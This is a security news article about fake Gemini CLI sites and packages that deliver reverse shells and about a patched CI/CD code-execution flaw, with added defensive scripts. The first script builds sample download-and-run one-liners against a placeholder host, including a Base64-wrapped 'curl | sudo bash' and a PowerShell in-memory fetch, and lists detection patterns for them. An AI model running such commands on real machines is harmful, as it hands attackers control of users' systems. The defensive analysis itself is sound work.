The Dark Side of Gemini CLI: Malware and Vulnerabilities
Google's Gemini command-line interface has become a double target for attackers: NordVPN's threat intelligence unit revealed this week that multiple active campaigns are impersonating the tool to distribute malware, while separately, a maximum-severity vulnerability in the legitimate Gemini CLI itself was patched after researchers found it could allow remote code execution in developer pipelines.
Fake Websites, Cloned Repos, and Reverse Shells
NordVPN disclosed on April 29 that it had uncovered campaigns targeting developers and tech-savvy users through fake websites, cloned repositories, and deceptive social media posts designed to mimic the official Gemini CLI. Instead of delivering legitimate software, the campaigns distribute a reverse shell that gives attackers complete remote control over compromised machines.
On macOS, the attack begins with a convincing clone of the official Gemini CLI page that instructs users to run a Base64-encoded terminal command. Once decoded, the command downloads a malicious script and runs it with the highest administrative privileges, enabling the attacker to read, modify, or delete any file on the device. The Windows variant uses a PowerShell command disguised with variable names like "$Install='GeminiCLI'" to execute malicious code directly in memory, a "fileless" technique that leaves no payload on disk for file-based antivirus to scan.
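As an added illustration (not code from the NordVPN report or from Gemini CLI), the Python script below shows the check a user should run before pasting any such one-liner: decode every Base64 blob in it, including the UTF-16LE form that powershell -EncodedCommand expects, and flag what the plaintext actually does. The two sample commands are constructed to have the shape described above and are not the campaign's real payloads; example.invalid is a reserved name that never resolves.

```python
import base64
import re

# Constructed look-alikes of the two install flows described above, not the
# campaign's real payloads. example.invalid is a reserved name that never resolves.
MAC_CMD = "echo " + base64.b64encode(
    b"curl -fsSL https://example.invalid/install.sh | sudo bash"
).decode() + " | base64 -d | sh"

PS_PAYLOAD = ("$Install='GeminiCLI'; "
              "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')")
# powershell -EncodedCommand takes the Base64 of the script's UTF-16LE bytes.
WIN_CMD = ("powershell -NoProfile -EncodedCommand "
           + base64.b64encode(PS_PAYLOAD.encode("utf-16-le")).decode())

# Behaviours a pasted "installer" should never need; each entry is (regex, reason).
RISKY = [
    (r"\bsudo\b|\bosascript\b.*administrator", "runs with elevated privileges"),
    (r"(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b", "pipes a download straight into a shell"),
    (r"base64\s+(-d|--decode)\s*\|\s*(sudo\s+)?(ba|z)?sh\b",
     "decodes an obfuscated payload straight into a shell"),
    (r"\bIEX\b|Invoke-Expression", "evaluates downloaded text in memory (fileless)"),
    (r"DownloadString|Invoke-WebRequest|\biwr\b", "fetches code from a remote host"),
]

BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_layers(cmd: str, depth: int = 2) -> list[str]:
    """Return cmd followed by the plaintext of every Base64 blob it carries,
    peeling nested encodings up to `depth` levels. Bytes that are zero at every
    odd offset are ASCII in UTF-16LE (the -EncodedCommand format); anything
    else is decoded as UTF-8."""
    layers = [cmd]
    if depth == 0:
        return layers
    for blob in BLOB.findall(cmd):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:          # not Base64 after all (binascii.Error is a ValueError)
            continue
        if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
            text = raw.decode("utf-16-le", errors="replace")
        else:
            text = raw.decode("utf-8", errors="replace")
        layers.extend(decode_layers(text, depth - 1))
    return layers


def assess(cmd: str) -> list[str]:
    """Decode the command and return the sorted, de-duplicated reasons it is risky
    (an empty list means none of the heuristics fired)."""
    reasons = {reason for layer in decode_layers(cmd)
               for pattern, reason in RISKY if re.search(pattern, layer)}
    return sorted(reasons)


if __name__ == "__main__":
    for label, cmd in (("macOS one-liner", MAC_CMD), ("Windows one-liner", WIN_CMD)):
        print(label)
        for layer in decode_layers(cmd)[1:]:
            print("  decodes to:", layer)
        for reason in assess(cmd):
            print("  risk:", reason)
```

The UTF-16LE test matters: a PowerShell payload decoded as UTF-8 looks like harmless NUL-separated letters and none of the patterns fire, which is exactly what the encoding obscures from a casual look.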
NordVPN researchers also identified a typosquatting operation aimed at the npm package registry, with look-alike names including "gemini/cli" and "gemini-cli" prepared to mimic the official package, which is published under the scoped name "@google/gemini-cli". Though the fake packages had not yet appeared in the npm registry at the time of analysis, their preparation signals an imminent threat.
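An added example of the install-time check this implies, not code from the report or from npm: classify a package spec against the exact official name before it reaches npm install. The sample specs are constructed from the decoy names above plus a few other shapes; the labels are this example's own. One caveat worth knowing: npm treats an unscoped "owner/repo" spec as a GitHub shorthand, so "gemini/cli" would be fetched from a GitHub repository of that name rather than from the registry at all.

```python
from __future__ import annotations
import re

OFFICIAL = "@google/gemini-cli"   # the scoped name the real CLI is published under

# Constructed install specs: the decoys named in the report plus a few more shapes.
SAMPLES = ["@google/gemini-cli", "@google/gemini-cli@0.39.1", "gemini-cli", "gemini/cli",
           "@gooogle/gemini-cli", "@google/gemini_cli", "@google/gemini-clii", "lodash"]


def split_spec(spec: str) -> tuple[str, str | None]:
    """'name@range' -> (name, range); the leading '@' of a scope is not a separator."""
    scoped = spec.startswith("@")
    body, at, rng = (spec[1:] if scoped else spec).partition("@")
    return ("@" + body if scoped else body), (rng if at else None)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, the usual measure for typosquat detection."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(name: str) -> str:
    """Lower-case and drop every non-alphanumeric so '-', '_' and '.' swaps collapse."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def classify(spec: str) -> str:
    """Only 'official' should be allowed through; every other label is a reason to stop."""
    name, _ = split_spec(spec)
    if name == OFFICIAL:
        return "official"
    if not name.startswith("@") and "/" in name:
        # npm treats an unscoped owner/repo as a GitHub shorthand, so this would
        # install from a GitHub repository of that name, never from the registry.
        return "github-shorthand"
    scope, _, bare = name.rpartition("/")
    if normalize(bare) == normalize(OFFICIAL.rpartition("/")[2]):
        return "scoped-lookalike" if scope else "unscoped-lookalike"
    if edit_distance(name.lower(), OFFICIAL) <= 2:
        return "near-miss"
    return "unrelated"


if __name__ == "__main__":
    for spec in SAMPLES:
        print(f"{spec:28} {classify(spec)}")
```

The policy is deliberately an exact match: a dropped scope, a misspelt scope, a swapped separator and a one-character typo are all distinct ways to land on a package that is not the one Google publishes.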
Legitimate Tool Also Carries Critical Flaw
In a separate but related concern, Google patched a CVSS 10.0 vulnerability in Gemini CLI that allowed unprivileged attackers to execute arbitrary commands on host systems. Discovered by Novee Security, the flaw stemmed from how the tool's headless mode — commonly used in CI/CD pipelines and GitHub Actions workflows — automatically trusted workspace folders for loading configuration files without review or sandboxing.
"Code execution on the host running the agent gave an unprivileged outsider access to whatever secrets, credentials, and source code the workflow could reach," the Novee team explained. "Enough for token theft, supply-chain pivots, and lateral movement into downstream systems."
The fix shipped in Gemini CLI versions 0.39.1 and 0.40.0-preview.3, but Google warned that organizations using the run-gemini-cli GitHub Action without pinning a specific version may need to update their workflows, as the patch changes how workspace trust and the "--yolo" mode function.
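An added example, not Google's or Novee's code: a version gate built from the fixed versions named above, and a line-based scan of a GitHub Actions workflow for the two things the update advice targets, a step that is not pinned to a specific commit and a yolo setting that auto-approves the agent's tool calls. The workflow text is constructed; the "args" input name and the 40-hex commits in the hardened version are placeholders, not the action's real input or real commits; treating every release after the fixed ones as patched is an assumption the page does not state.

```python
import re

# Fixed versions named above: stable 0.39.1 and preview 0.40.0-preview.3.
FIXED_STABLE = (0, 39, 1)
FIXED_PREVIEW_CORE, FIXED_PREVIEW_NUM = (0, 40, 0), 3

VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.(\d+))?")


def parse_version(v: str):
    """'0.40.0-preview.3' -> ((0, 40, 0), ('preview', 3)); a plain release gives pre=None."""
    m = VERSION_RE.fullmatch(v.strip())
    if not m:
        raise ValueError(f"unrecognised version: {v!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = (m.group(4), int(m.group(5))) if m.group(4) else None
    return core, pre


def is_patched(v: str) -> bool:
    """True when `v` is one of the fixed versions or later.
    Assumption (not stated on the page): every later release keeps the fix."""
    core, pre = parse_version(v)
    if core == FIXED_PREVIEW_CORE and pre is not None:
        # 0.40.0 previews: fixed from preview.3; any other pre-release tag is unknown.
        return pre[0] == "preview" and pre[1] >= FIXED_PREVIEW_NUM
    return core >= FIXED_STABLE


# Constructed workflows, not ones shipped with the action. "args" is a placeholder
# input name, and the 40-hex commits below are placeholders, not real commits.
WEAK_WORKFLOW = """\
name: gemini-review
on: [pull_request]
jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: google-github-actions/run-gemini-cli@v0
        with:
          args: "--yolo"
"""

HARDENED_WORKFLOW = """\
name: gemini-review
on: [pull_request]
jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: google-github-actions/run-gemini-cli@89abcdef0123456789abcdef0123456789abcdef
        # no auto-approval flag: tool calls stay gated
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s@]+)@(\S+)")
SHA_RE = re.compile(r"[0-9a-f]{40}")


def lint_workflow(text: str) -> list[tuple[int, str]]:
    """Line-based scan (no YAML parser needed) returning (line number, problem)
    for every action not pinned to a full commit SHA and every yolo setting."""
    problems = []
    for no, line in enumerate(text.splitlines(), 1):
        if m := USES_RE.match(line):
            action, ref = m.groups()
            if not SHA_RE.fullmatch(ref):
                problems.append((no, f"{action} pinned to mutable ref {ref!r}, not a commit SHA"))
        if re.search(r"\byolo\b", line):
            problems.append((no, "yolo mode auto-approves the agent's tool calls in headless CI"))
    return problems


if __name__ == "__main__":
    for v in ("0.39.0", "0.39.1", "0.40.0-preview.2", "0.40.0-preview.3", "0.40.0"):
        print(f"{v:18} patched={is_patched(v)}")
    for label, wf in (("weak", WEAK_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, lint_workflow(wf) or "clean")
```

Pinning to a full commit SHA rather than a tag is what makes "update the workflow" a deliberate, reviewable change instead of something a floating ref applies silently; the yolo check is a plain word match so that it also catches the mode when it is set through a settings key rather than the flag.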
Converging Threats to Developer Toolchains
The twin developments underscore growing risks in the AI-powered developer tool ecosystem. NordVPN urged developers to download tools only from official sources and never to run terminal commands copied from unfamiliar websites. Google, meanwhile, advised teams to validate inputs, enforce least privilege, and update their CI/CD configurations to use explicit trust mechanisms.
"AI coding agents now sit inside CI/CD pipelines holding the execution privileges of a trusted contributor," Novee researchers warned. "This level of access can lead to critical supply-chain attacks, the type that stem from the developer workflow itself."
